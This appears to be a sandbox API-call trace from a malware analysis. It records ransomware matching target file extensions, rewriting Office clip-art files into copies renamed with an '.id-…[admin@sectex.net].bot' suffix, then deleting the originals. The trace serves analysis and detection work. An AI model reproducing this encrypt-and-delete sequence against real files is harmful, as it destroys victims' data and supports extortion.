	[0160.077] lstrlenW (lpString=".doc") returned 4
	[0160.077] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.077] lstrlenW (lpString=".docx") returned 5
	[0160.077] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0160.088] lstrlenW (lpString=".pdf") returned 4
	[0160.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.088] lstrlenW (lpString=".xls") returned 4
	[0160.088] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.088] lstrlenW (lpString=".xlsx") returned 5
	[0160.088] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0160.088] lstrlenW (lpString=".ppt") returned 4
	[0160.088] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.094] lstrlenW (lpString=".zip") returned 4
	[0160.094] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.094] lstrlenW (lpString=".rar") returned 4
	[0160.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString=".bz2") returned 4
	[0160.095] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString=".7z") returned 3
	[0160.095] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.095] lstrlenW (lpString=".dbf") returned 4
	[0160.095] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.095] lstrlenW (lpString=".1cd") returned 4
	[0160.095] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.095] lstrlenW (lpString=".jpg") returned 4
	[0160.095] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.095] lstrlenW (lpString=".doc") returned 4
	[0160.095] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString=".docx") returned 5
	[0160.095] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0160.095] lstrlenW (lpString=".pdf") returned 4
	[0160.095] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString=".xls") returned 4
	[0160.095] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.095] lstrlenW (lpString=".xlsx") returned 5
	[0160.095] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0160.095] lstrlenW (lpString=".ppt") returned 4
	[0160.095] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.095] lstrlenW (lpString=".zip") returned 4
	[0160.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.096] lstrlenW (lpString=".rar") returned 4
	[0160.096] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.096] lstrlenW (lpString=".bz2") returned 4
	[0160.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.096] lstrlenW (lpString=".7z") returned 3
	[0160.096] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.096] lstrlenW (lpString=".dbf") returned 4
	[0160.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.096] lstrlenW (lpString=".1cd") returned 4
	[0160.096] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 63
	[0160.096] lstrlenW (lpString=".jpg") returned 4
	[0160.096] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.096] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.096] lstrlenW (lpString="J0107152.WMF") returned 12
	[0160.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.097] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=22532) returned 1
	[0160.097] CloseHandle (hObject=0x37c) returned 1
	[0160.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf")) returned 0x20
	[0160.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.097] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.097] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0160.162] GetLastError () returned 0x0
	[0160.162] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x5804, lpOverlapped=0x0) returned 1
	[0160.229] WriteFile (in: hFile=0x1b4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x5810, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x5810, lpOverlapped=0x0) returned 1
	[0160.296] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.296] WriteFile (in: hFile=0x1b4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.296] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.296] CloseHandle (hObject=0x1b4) returned 1
	[0160.296] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.296] SetEndOfFile (hFile=0x37c) returned 1
	[0160.299] CloseHandle (hObject=0x37c) returned 1
	[0160.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.299] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf")) returned 1
	[0160.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.318] lstrlenW (lpString=".doc") returned 4
	[0160.318] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.318] lstrlenW (lpString=".docx") returned 5
	[0160.318] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.318] lstrlenW (lpString=".pdf") returned 4
	[0160.318] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.318] lstrlenW (lpString=".xls") returned 4
	[0160.318] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.318] lstrlenW (lpString=".xlsx") returned 5
	[0160.319] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.319] lstrlenW (lpString=".ppt") returned 4
	[0160.319] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.319] lstrlenW (lpString=".zip") returned 4
	[0160.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.319] lstrlenW (lpString=".rar") returned 4
	[0160.319] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString=".bz2") returned 4
	[0160.319] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString=".7z") returned 3
	[0160.319] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.319] lstrlenW (lpString=".dbf") returned 4
	[0160.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.319] lstrlenW (lpString=".1cd") returned 4
	[0160.319] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.319] lstrlenW (lpString=".jpg") returned 4
	[0160.319] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.319] lstrlenW (lpString=".doc") returned 4
	[0160.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString=".docx") returned 5
	[0160.319] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.319] lstrlenW (lpString=".pdf") returned 4
	[0160.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.319] lstrlenW (lpString=".xls") returned 4
	[0160.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.320] lstrlenW (lpString=".xlsx") returned 5
	[0160.320] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.320] lstrlenW (lpString=".ppt") returned 4
	[0160.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.320] lstrlenW (lpString=".zip") returned 4
	[0160.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.320] lstrlenW (lpString=".rar") returned 4
	[0160.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.320] lstrlenW (lpString=".bz2") returned 4
	[0160.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.320] lstrlenW (lpString=".7z") returned 3
	[0160.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.320] lstrlenW (lpString=".dbf") returned 4
	[0160.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.320] lstrlenW (lpString=".1cd") returned 4
	[0160.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 63
	[0160.320] lstrlenW (lpString=".jpg") returned 4
	[0160.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.320] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.320] lstrlenW (lpString="J0107182.WMF") returned 12
	[0160.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.683] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=16100) returned 1
	[0160.684] CloseHandle (hObject=0x388) returned 1
	[0160.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf")) returned 0x20
	[0160.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.032] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.032] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.033] GetLastError () returned 0x0
	[0161.033] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3ee4, lpOverlapped=0x0) returned 1
	[0161.044] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3ef0, lpOverlapped=0x0) returned 1
	[0161.045] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.045] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.045] SetEndOfFile (hFile=0x25c) returned 1
	[0161.045] CloseHandle (hObject=0x25c) returned 1
	[0161.045] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.045] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.048] CloseHandle (hObject=0x1d8) returned 1
	[0161.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.048] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf")) returned 1
	[0161.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.049] lstrlenW (lpString=".doc") returned 4
	[0161.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.049] lstrlenW (lpString=".docx") returned 5
	[0161.049] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.049] lstrlenW (lpString=".pdf") returned 4
	[0161.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.049] lstrlenW (lpString=".xls") returned 4
	[0161.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.049] lstrlenW (lpString=".xlsx") returned 5
	[0161.049] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.049] lstrlenW (lpString=".ppt") returned 4
	[0161.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.049] lstrlenW (lpString=".zip") returned 4
	[0161.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.049] lstrlenW (lpString=".rar") returned 4
	[0161.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.049] lstrlenW (lpString=".bz2") returned 4
	[0161.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.049] lstrlenW (lpString=".7z") returned 3
	[0161.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.049] lstrlenW (lpString=".dbf") returned 4
	[0161.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.050] lstrlenW (lpString=".1cd") returned 4
	[0161.050] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.050] lstrlenW (lpString=".jpg") returned 4
	[0161.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.050] lstrlenW (lpString=".doc") returned 4
	[0161.050] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString=".docx") returned 5
	[0161.050] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.050] lstrlenW (lpString=".pdf") returned 4
	[0161.050] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString=".xls") returned 4
	[0161.050] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.050] lstrlenW (lpString=".xlsx") returned 5
	[0161.050] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.050] lstrlenW (lpString=".ppt") returned 4
	[0161.050] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.050] lstrlenW (lpString=".zip") returned 4
	[0161.050] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.050] lstrlenW (lpString=".rar") returned 4
	[0161.050] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString=".bz2") returned 4
	[0161.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.050] lstrlenW (lpString=".7z") returned 3
	[0161.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.050] lstrlenW (lpString=".dbf") returned 4
	[0161.050] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.051] lstrlenW (lpString=".1cd") returned 4
	[0161.051] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 63
	[0161.051] lstrlenW (lpString=".jpg") returned 4
	[0161.051] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.051] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.051] lstrlenW (lpString="J0107266.WMF") returned 12
	[0161.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.056] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5868) returned 1
	[0161.056] CloseHandle (hObject=0x388) returned 1
	[0161.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf")) returned 0x20
	[0161.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.057] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.057] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.058] GetLastError () returned 0x0
	[0161.058] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x16ec, lpOverlapped=0x0) returned 1
	[0161.059] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x16f0, lpOverlapped=0x0) returned 1
	[0161.060] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.060] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.061] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.061] CloseHandle (hObject=0x3d0) returned 1
	[0161.061] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.061] SetEndOfFile (hFile=0x388) returned 1
	[0161.063] CloseHandle (hObject=0x388) returned 1
	[0161.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.064] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf")) returned 1
	[0161.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 63
	[0161.065] lstrlenW (lpString=".doc") returned 4
	[0161.065] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString=".docx") returned 5
	[0161.065] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.065] lstrlenW (lpString=".pdf") returned 4
	[0161.065] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.065] lstrlenW (lpString=".xls") returned 4
